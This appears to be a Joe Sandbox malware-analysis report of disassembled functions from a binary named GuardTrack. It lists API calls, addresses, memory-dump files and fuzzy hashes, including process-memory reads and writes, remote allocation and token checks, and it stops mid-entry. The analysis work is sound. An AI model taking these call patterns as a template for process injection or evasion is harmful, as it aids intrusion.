MessageBoxW.USER32(?,?,?,?), ref: 006150A8
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 006150BE
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 006150C5

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: bdfc97848b4c1340bc410afee8e46a95e6757e9fafbb1b2ea17208a767ccdcb2
Instruction ID: d0a87feb1bd323b5bc53491d8c347999c8e29247abc1dba195502eda47441f97
Opcode Fuzzy Hash: bdfc97848b4c1340bc410afee8e46a95e6757e9fafbb1b2ea17208a767ccdcb2
Instruction Fuzzy Hash: 32114C76904618FBD7019FE89C04ADBBFAFAB85321F140256F929D3361D671898087F0

Function 00608E20 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00608E3C
GetLastError.KERNEL32(?,00608900,?,?,?), ref: 00608E46
GetProcessHeap.KERNEL32(00000008,?,?,00608900,?,?,?), ref: 00608E55
HeapAlloc.KERNEL32(00000000,?,00608900,?,?,?), ref: 00608E5C
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00608E73

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 6c3e6ee061ad7c4b434e01e64587548a27c0a77cffc850771b14c48e73f3291f
Instruction ID: e0fe85a7026b4e3ae537f6a5d6f619082b2861179b0770f87989b1ba157256a1
Opcode Fuzzy Hash: 6c3e6ee061ad7c4b434e01e64587548a27c0a77cffc850771b14c48e73f3291f
Instruction Fuzzy Hash: 5A018174240214FFEB249FA5DC48DAB7FBEEF8A754B100529FA89C3260DB719C10CA60

Function 006157FF Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0061581B
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00615829
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00615831
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0061583B
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00615877

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 735f830dcfe90a22c41c885efeb91ac210d812a995b9a2cac8e38b5c4ccaa845
Instruction ID: 0df07225559ddb400e105de2be1c7ab607aa1ab79b83dcc680fb4d33a0461b58
Opcode Fuzzy Hash: 735f830dcfe90a22c41c885efeb91ac210d812a995b9a2cac8e38b5c4ccaa845
Instruction Fuzzy Hash: CE011735D01A29DBEF04AFE5D8499EDFBBABB49711F044556E602B2240DB309590CBA1

Function 00607D28 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00607C62,80070057,?,?,?,00608073), ref: 00607D45
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00607C62,80070057,?,?), ref: 00607D60
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00607C62,80070057,?,?), ref: 00607D6E
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00607C62,80070057,?), ref: 00607D7E
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00607C62,80070057,?,?), ref: 00607D8A

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 74f1d7721cee6b14fe6675553ed7f834c6e25665fd57beac81624bb1b22c6b78
Instruction ID: e4634d3d644982c51c633974ca794878c82a39e64c153a238d7a555a671aaeb9
Opcode Fuzzy Hash: 74f1d7721cee6b14fe6675553ed7f834c6e25665fd57beac81624bb1b22c6b78
Instruction Fuzzy Hash: 6101B176A01224BFDB114F54DD04BAA7BAEEF48351F105014FD08D2290D771ED00CBA0

Function 00608CC7 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00608CDE
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00608CE8
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00608CF7
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00608CFE
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00608D14

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: efe4d4c69652dd9f621eb6a8f760bacea10935f1e43c66914b985ce1d16c7481
Instruction ID: 784a7ba58b8deef375969505639a16470c10a0699c3f0af86e355138eaaf1825
Opcode Fuzzy Hash: efe4d4c69652dd9f621eb6a8f760bacea10935f1e43c66914b985ce1d16c7481
Instruction Fuzzy Hash: C8F0AF38240214BFEF215FE4DC88EA73BAEEF5AB54B105525FA44C32D0CA709C40DB60

Function 00608D28 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00608D3F
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00608D49
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00608D58
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00608D5F
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00608D75

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 3d5cab5975e3b8d4a76afeaccb8c61a97aaa25db9cb61da1f01e076e16fd2fb3
Instruction ID: a2547f4242f0392ab916c34148dbba59b76c8a44b73f0abda489e151097a1ee9
Opcode Fuzzy Hash: 3d5cab5975e3b8d4a76afeaccb8c61a97aaa25db9cb61da1f01e076e16fd2fb3
Instruction Fuzzy Hash: 08F0AF34240214AFEB215FA4EC88FA73BAEEF4AB54F041215FA84C32D0CBB09D40DB60

Function 0060CD7C Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0060CD90
GetWindowTextW.USER32(00000000,?,00000100), ref: 0060CDA7
MessageBeep.USER32(00000000), ref: 0060CDBF
KillTimer.USER32(?,0000040A), ref: 0060CDDB
EndDialog.USER32(?,00000001), ref: 0060CDF5

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 5487c8f250709c1bd244875a72177f6ffc11bff448e61c9b4beccc474009ee8c
Instruction ID: 999a82058758f23684050b4ca1b6b0b93cb9f1b1abab849275ac3761d9b3b510
Opcode Fuzzy Hash: 5487c8f250709c1bd244875a72177f6ffc11bff448e61c9b4beccc474009ee8c
Instruction Fuzzy Hash: A901A234584714ABFB245B60DC8EBA67B7AFF01711F000669A682A10E1DBF0A954CA80

Function 005B178C Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 005B179B
StrokeAndFillPath.GDI32(?,?,005EBBC9,00000000,?), ref: 005B17B7
SelectObject.GDI32(?,00000000), ref: 005B17CA
DeleteObject.GDI32 ref: 005B17DD
StrokePath.GDI32(?), ref: 005B17F8

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: dfe6e7e8cbfd335aadc659a5d8c9bea8737e88537efab0520cd9efe0129859eb
Instruction ID: caa677be89fc5dc79948bdd9b9b6a5c2a1493ecffe93b0384b86f1e1ff550e1b
Opcode Fuzzy Hash: dfe6e7e8cbfd335aadc659a5d8c9bea8737e88537efab0520cd9efe0129859eb
Instruction Fuzzy Hash: 22F08130018A48EBEB594F15EC0CB593FA2F701322F049220F92D851F1DB3056D1CF15

Function 005BE3C6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 005D0FE6: std::exception::exception.LIBCMT ref: 005D101C
Part of subcall function 005D0FE6: __CxxThrowException@8.LIBCMT ref: 005D1031

Part of subcall function 005C1A36: _memmove.LIBCMT ref: 005C1A77

Part of subcall function 005C1680: _memmove.LIBCMT ref: 005C16DB

__swprintf.LIBCMT ref: 005BE598

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 005BE431

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 9ceff52117b1e6437d8e37d31853c2479eb234554281031a94aeee4db53e9a93
Instruction ID: fe497f1eb39754231328223978bcb40a659dd539c4734d2d28e3c9b5beeb7bda
Opcode Fuzzy Hash: 9ceff52117b1e6437d8e37d31853c2479eb234554281031a94aeee4db53e9a93
Instruction Fuzzy Hash: FA9192715046029FC724EF64C89ADBEBFA4FFD6300F44091EF592972A2EA24ED44CB56

Function 0061BF7E Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 005D0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005C2A58,?,00008000), ref: 005D02A4

CoInitialize.OLE32(00000000), ref: 0061BFFE
CoCreateInstance.OLE32(00643D3C,00000000,00000001,00643BAC,?), ref: 0061C017
CoUninitialize.OLE32 ref: 0061C034

Part of subcall function 005B4D37: __itow.LIBCMT ref: 005B4D62
Part of subcall function 005B4D37: __swprintf.LIBCMT ref: 005B4DAC

Strings

.lnk, xrefs: 0061BFE0, 0061BFEE

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: e97e25964e57c1cfaa2e80fefa67486b375d7cf3f0ee5ede85d382212d2ea077
Instruction ID: cbb2bb68885147462d731f62cf224d67f2d2cd9c028aaae4ca195a970b428912
Opcode Fuzzy Hash: e97e25964e57c1cfaa2e80fefa67486b375d7cf3f0ee5ede85d382212d2ea077
Instruction Fuzzy Hash: 30A146756443029FC710DF54C884E9ABBE6FF89324F048998F8999B3A2CB31ED45CB91

Function 005D523D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 005D52CD

Part of subcall function 005E0320: __87except.LIBCMT ref: 005E035B

Strings

pow, xrefs: 005D52A5, 005D52C2

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 879ca9c155b320237b9d12fe9bea753a50f46d95860b6fee7c6df69e8bf66f72
Instruction ID: b33979f66160ec2554660b5a235ad7884ca809e8a8ab1ba02d89881edd8f5ebd
Opcode Fuzzy Hash: 879ca9c155b320237b9d12fe9bea753a50f46d95860b6fee7c6df69e8bf66f72
Instruction Fuzzy Hash: B4518C25E0964287CF297B1DCA4137E2F90BB40751F306D6BE0C5863E9FEB48CC89A52

Function 005D0654 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

#, xrefs: 005D0699
+, xrefs: 005D0690

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: a00f3b658e7ea88a36380b6025bce245a50d9cfbfaa00d99974507c5837fb363
Instruction ID: d0f8d71955bc2132dc49943f44231d8ffc152e410648b6fd18cf5d44a9c87243
Opcode Fuzzy Hash: a00f3b658e7ea88a36380b6025bce245a50d9cfbfaa00d99974507c5837fb363
Instruction Fuzzy Hash: 7F5100755402568FDF29DF68C848AFA7BA5FF56310F14805AF8929B3D0D734ACA2CB60

Function 005BE7F7 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 005BE937
_memmove.LIBCMT ref: 005BE9D0
_free.LIBCMT ref: 005BE9F6
_memmove.LIBCMT ref: 005BEAA9

Strings

#V\, xrefs: 005BE9E2

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: _memmove$_free
String ID: #V\
API String ID: 2620147621-1266075302
Opcode ID: 97f0b1443659afed24fe3f81e000d69cfbe977271e4ea38369c54c64fc31e184
Instruction ID: d59c5a17b8f5f208bfcd9541c4a66286905bc25d6343bd2e5759f6920dc04c99
Opcode Fuzzy Hash: 97f0b1443659afed24fe3f81e000d69cfbe977271e4ea38369c54c64fc31e184
Instruction Fuzzy Hash: 25515B716047428FDB24CF28C495BABBBE5FF85314F58492EE58987351E731E801CB52

Function 005CCF0C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005CCFC2
_memmove.LIBCMT ref: 005CD060
_memset.LIBCMT ref: 005CD084

Strings

ERCP, xrefs: 005CCF2D

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 5d0c022c2f4cf88c7976588dfe878b84908b0cef3e61f3bcf551316a4d9a2336
Instruction ID: be4655300bb1fe832e52a4c4ddf6b1ebf9ec3b81b6540271f63dad123e386cfa
Opcode Fuzzy Hash: 5d0c022c2f4cf88c7976588dfe878b84908b0cef3e61f3bcf551316a4d9a2336
Instruction Fuzzy Hash: E75190719007099FDB24CFA8C889BAABFF5FF44314F14856EE44ADB280E7319585CB50

Function 0060A3AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00611CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00609E4E,?,?,00000034,00000800,?,00000034), ref: 00611CE5

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0060A3F7

Part of subcall function 00611C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00609E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00611CB0

Part of subcall function 00611BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00611C08
Part of subcall function 00611BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00609E12,00000034,?,?,00001004,00000000,00000000), ref: 00611C18
Part of subcall function 00611BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00609E12,00000034,?,?,00001004,00000000,00000000), ref: 00611C2E

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0060A464
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0060A4B1

Strings

@, xrefs: 0060A4C9

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 861b073f2bb446e826dfdd3e81e707fbb1d7b446fd81468dffc85aa6be1d9dfa
Instruction ID: 2d4f947cf63cc96fb810271fce7f69738257e2d94dd01a63670d960152994d68
Opcode Fuzzy Hash: 861b073f2bb446e826dfdd3e81e707fbb1d7b446fd81468dffc85aa6be1d9dfa
Instruction Fuzzy Hash: 49417E7694121CBFDB10DFA4CD85ADEBBB9EF46340F044099FA45B7280DA706E85CBA1

Function 00637F6B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00640980,00000000,?,?,?,?), ref: 00638004
GetWindowLongW.USER32 ref: 00638021
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00638031

Strings

SysTreeView32, xrefs: 00637FD6

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 5ec266f1404cf0a7c9dbd47032fe15c46791397bda3c58b906d0c306596874cb
Instruction ID: 92757f389858c826366d442cf7bed3f0fa1c0af329f2b73816a807efda8cbb97
Opcode Fuzzy Hash: 5ec266f1404cf0a7c9dbd47032fe15c46791397bda3c58b906d0c306596874cb
Instruction Fuzzy Hash: DD31B071204205AFDB258E34CC45BEA7BAAFB45364F244329F975932E0CB30A8948BA0

Function 006379FE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00637A86
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00637A9A
SendMessageW.USER32(?,00001002,00000000,?), ref: 00637ABE

Strings

SysMonthCal32, xrefs: 00637A51

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
